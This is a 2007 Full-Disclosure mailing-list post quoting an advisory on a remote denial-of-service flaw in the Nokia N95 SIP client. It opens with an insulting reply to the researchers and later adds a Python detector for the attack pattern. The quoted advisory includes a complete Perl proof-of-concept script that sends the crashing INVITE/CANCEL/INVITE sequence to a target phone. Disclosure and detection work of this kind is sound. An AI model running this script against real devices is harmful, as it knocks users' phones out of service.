So almighty PhD, what is your thesis exactly? To me it seems to be 'how to run a fuzzer then write crappy perl scripts to exploit DoS conditions'.
Does this properly summarize your PhD credentials? I guess you could tack on 'after writing the crappy scripts, flood mailing lists with our crap, and get made fun of'. I am sure you will serve the academic community great one day when you teach "hacking" classes revolving around the latest editions of Hacking Exposed.

On Dec 5, 2007 11:05 AM, Radu State <[EMAIL PROTECTED]> wrote:
> Nokia N95 cellphone remote DoS using the SIP Stack
>
> Severity:
> High – Denial of Service
>
> Hardware:
> Nokia N95
>
> Firmware:
> Tested version: Nokia RM-159 V 12.0.013
>
> Notification:
> Vulnerability found: 11 September 2007
> Contact Nokia Support: 12 September 2007 / No reply
> Contact Nokia Security Support: 19 September 2007 / No reply
>
> Vulnerability Synopsis:
> If the device has the SIP Phone client activated, a sequence of SIP
> messages turns the device into an inconsistent state where the user is
> not able to operate it anymore until it reboots.
>
> The sequence of messages consists of 2 different SIP Dialogs, where the
> first initiates an INVITE transaction but immediately closes it (in an
> anticipated manner), while the second initiates a normal INVITE
> transaction that triggers the vulnerability of the target.
>
> The sequence of messages is illustrated below.
>
> X ------------------------- INVITE -----------------------> Nokiav12
> X <---------------------- 100 Trying ---------------------- Nokiav12
> X ------------------------- CANCEL -----------------------> Nokiav12
> X <----------------- OK (to the Cancel) ------------------- Nokiav12
> X <---------------- 487 Request Terminated ---------------- Nokiav12
>
> --------New Dialog--------
>
> X ------------------------- INVITE -----------------------> Nokiav12
> X <---------------------- 100 Trying ---------------------- Nokiav12
> X <---------------------- 180 Trying ---------------------- Nokiav12
>
> ---- The device does not work properly anymore ----
>
> Impact:
> A remote entity can take down all the services of the cell phone
>
> Resolution:
> As we did not get any proper reply from Nokia about the subject, the best
> way will be to disable the SIP Client
>
> Credits:
> Humberto J. Abdelnur (Ph.D Student)
> Radu State (Ph.D)
> Olivier Festor (Ph.D)
>
> This vulnerability was identified by the Madynes research team at INRIA
> Lorraine, using KiF the Madynes VoIP fuzzer.
> http://madynes.loria.fr/
>
> Proof of Concept:
>
> A perl script (nokiav12.pl) is attached to this mail. Before launching
> it, the SIP phone has to be initialised in the target device
>
> Command:
> perl nokiav12.pl <dst_IP> <username> <SourceIp> <SourceUsername>
>
> Eg. perl nokiav12.pl 192.168.1.119 lupilu 192.168.1.2 tucu
>
> #!/usr/bin/perl
>
> ##################################################
> # Vulnerability discovered using KiF ~ Kiph      #
> #                                                #
> # Authors:                                       #
> #   Humberto J. Abdelnur (Ph.D Student)          #
> #   Radu State (Ph.D)                            #
> #   Olivier Festor (Ph.D)                        #
> #                                                #
> # Madynes Team, LORIA - INRIA Lorraine           #
> # http://madynes.loria.fr                        #
> ##################################################
>
> use IO::Socket::INET;
> use String::Random;
>
> die "Usage $0 <targetIP> <targetUser> <attackerIP> <attackerUser>"
>     unless ($ARGV[3]);
>
> $targetUser = $ARGV[1];
> $targetIP   = $ARGV[0];
>
> $attackerUser = $ARGV[3];
> $attackerIP   = $ARGV[2];
>
> # UDP socket bound to the local SIP port, talking to the target's SIP port
> $socket = IO::Socket::INET->new(
>     Proto     => 'udp',
>     PeerPort  => 5060,
>     PeerAddr  => $targetIP,
>     LocalPort => 5060);
>
> # random Call-ID and CSeq for the first dialog
> $foo    = String::Random->new;
> $callid = $foo->randpattern("CCccnCn");
> $cseq   = $foo->randregex('\d\d\d\d');
>
> # SDP body; each "\r" plus the literal line break yields the CRLF SIP expects
> $sdp = "v=0\r
> o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP\r
> s=-\r
> c=IN IP4 $attackerIP\r
> t=0 0\r
> m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r
> a=sendrecv\r
> a=ptime:20\r
> a=maxptime:200\r
> a=fmtp:96 mode-change-neighbor=1\r
> a=fmtp:18 annexb=no\r
> a=fmtp:98 0-15\r
> a=rtpmap:96 AMR/8000/1\r
> a=rtpmap:0 PCMU/8000/1\r
> a=rtpmap:8 PCMA/8000/1\r
> a=rtpmap:97 iLBC/8000/1\r
> a=rtpmap:18 G729/8000/1\r
> a=rtpmap:98 telephone-event/8000/1\r
> a=rtpmap:13 CN/8000/1\r
> ";
>
> $sdplen = length $sdp;
>
> # Dialog 1: INVITE, wait for the 100 Trying, then CANCEL it straight away
> $msg = "INVITE sip:[EMAIL PROTECTED] SIP/2.0\r
> Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
> From: <sip:[EMAIL PROTECTED]>;tag=1\r
> To: <sip:[EMAIL PROTECTED]>\r
> Call-ID: [EMAIL PROTECTED]
> CSeq: $cseq INVITE\r
> Max-Forwards: 70\r
> Contact: <sip:[EMAIL PROTECTED]>\r
> Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY, MESSAGE\r
> Content-Type: application/sdp\r
> Content-Length: $sdplen\r
> \r
> $sdp";
> $socket->send($msg);
> $text = '';
> while (not $text =~ /^SIP\/2.0 100(.\r\n)*/ ) {
>     $socket->recv($text, 1024, 0);
> }
>
> $msg = "CANCEL sip:[EMAIL PROTECTED] SIP/2.0\r
> Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
> From: <sip:[EMAIL PROTECTED]>;tag=1\r
> To: <sip:[EMAIL PROTECTED]>;tag=1\r
> Call-ID: [EMAIL PROTECTED]
> CSeq: $cseq CANCEL\r
> Max-Forwards: 70\r
> Content-Length: 0\r
> \r
> ";
> $socket->send($msg);
> sleep 1;    # Perl sleep (the posted script had Python's time.sleep here)
>
> # Dialog 2: a fresh Call-ID/CSeq and an ordinary INVITE
> $callid = $foo->randpattern("CCccnCn");
> $cseq   = $foo->randregex('\d\d\d\d');
> $msg = "INVITE sip:[EMAIL PROTECTED] SIP/2.0\r
> Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK2\r
> From: <sip:[EMAIL PROTECTED]>;tag=2\r
> To: <sip:[EMAIL PROTECTED]>\r
> Call-ID: [EMAIL PROTECTED]
> CSeq: $cseq INVITE\r
> Contact: <sip:[EMAIL PROTECTED]>\r
> Max-Forwards: 70\r
> Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY, MESSAGE\r
> Content-Type: application/sdp\r
> Content-Length: $sdplen\r
> \r
> $sdp";
> $socket->send($msg);
>
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
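As an added example (not part of this thread or of the Madynes code), here is a defender-side detector for the INVITE / CANCEL / new-INVITE pattern the quoted advisory describes, run over constructed SIP requests as a phone or SIP proxy would receive them; the function names, the 5-second window and the 192.0.2.x sample addresses are assumptions.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

REQ_LINE = re.compile(r"^([A-Z]+) sip:\S+ SIP/2\.0\r?$")          # requests only, not "SIP/2.0 100"
CALL_ID = re.compile(r"^Call-ID:\s*(\S+)\s*$", re.IGNORECASE | re.MULTILINE)

def parse_request(raw):
    """Return (method, call_id) for a SIP request; None for responses or junk."""
    m = REQ_LINE.match(raw.split("\n", 1)[0])
    c = CALL_ID.search(raw)
    return (m.group(1), c.group(1)) if m and c else None

@dataclass
class SourceState:
    open_invites: set = field(default_factory=set)   # Call-IDs with an INVITE still pending
    cancelled_at: Optional[float] = None             # when this source last CANCELled one

def find_cancel_then_invite(events, window=5.0):
    """events: (timestamp, src_ip, raw_sip_message) as received by the phone.  Flags each
    INVITE opening a new dialog within `window` seconds of the same source CANCELling its
    own earlier INVITE (the two-dialog sequence above).  Returns [(timestamp, src_ip)]."""
    alerts, state = [], {}
    for ts, src, raw in events:
        parsed = parse_request(raw)
        if parsed is None:
            continue                                  # responses / non-SIP traffic ignored
        method, call_id = parsed
        st = state.setdefault(src, SourceState())
        if method == "INVITE" and call_id not in st.open_invites:   # retransmits excluded
            if st.cancelled_at is not None and ts - st.cancelled_at <= window:
                alerts.append((ts, src))
            st.open_invites.add(call_id)
        elif method == "CANCEL" and call_id in st.open_invites:
            st.open_invites.discard(call_id)
            st.cancelled_at = ts
    return alerts

def _req(method, call_id, branch, src):
    """Minimal constructed SIP request; 192.0.2.0/24 addresses are documentation values."""
    return (f"{method} sip:lupilu@192.0.2.10 SIP/2.0\r\nVia: SIP/2.0/UDP {src};branch={branch}\r\n"
            f"Call-ID: {call_id}\r\nCSeq: 1 {method}\r\nContent-Length: 0\r\n\r\n")
# Constructed traffic: the advisory's INVITE/CANCEL/INVITE from one caller, then an ordinary call.
SAMPLE_EVENTS = [
    (0.00, "192.0.2.20", _req("INVITE", "aB1x2C3@192.0.2.20", "z9hG4bK1", "192.0.2.20")),
    (0.05, "192.0.2.20", _req("CANCEL", "aB1x2C3@192.0.2.20", "z9hG4bK1", "192.0.2.20")),
    (1.10, "192.0.2.20", _req("INVITE", "Qq7z9R4@192.0.2.20", "z9hG4bK2", "192.0.2.20")),
    (3.00, "192.0.2.30", _req("INVITE", "abc123@192.0.2.30", "z9hG4bK9", "192.0.2.30")),
]
```

Running `find_cancel_then_invite(SAMPLE_EVENTS)` flags only the second INVITE from 192.0.2.20; a single aborted call followed by nothing, or an ordinary call from another source, produces no alert.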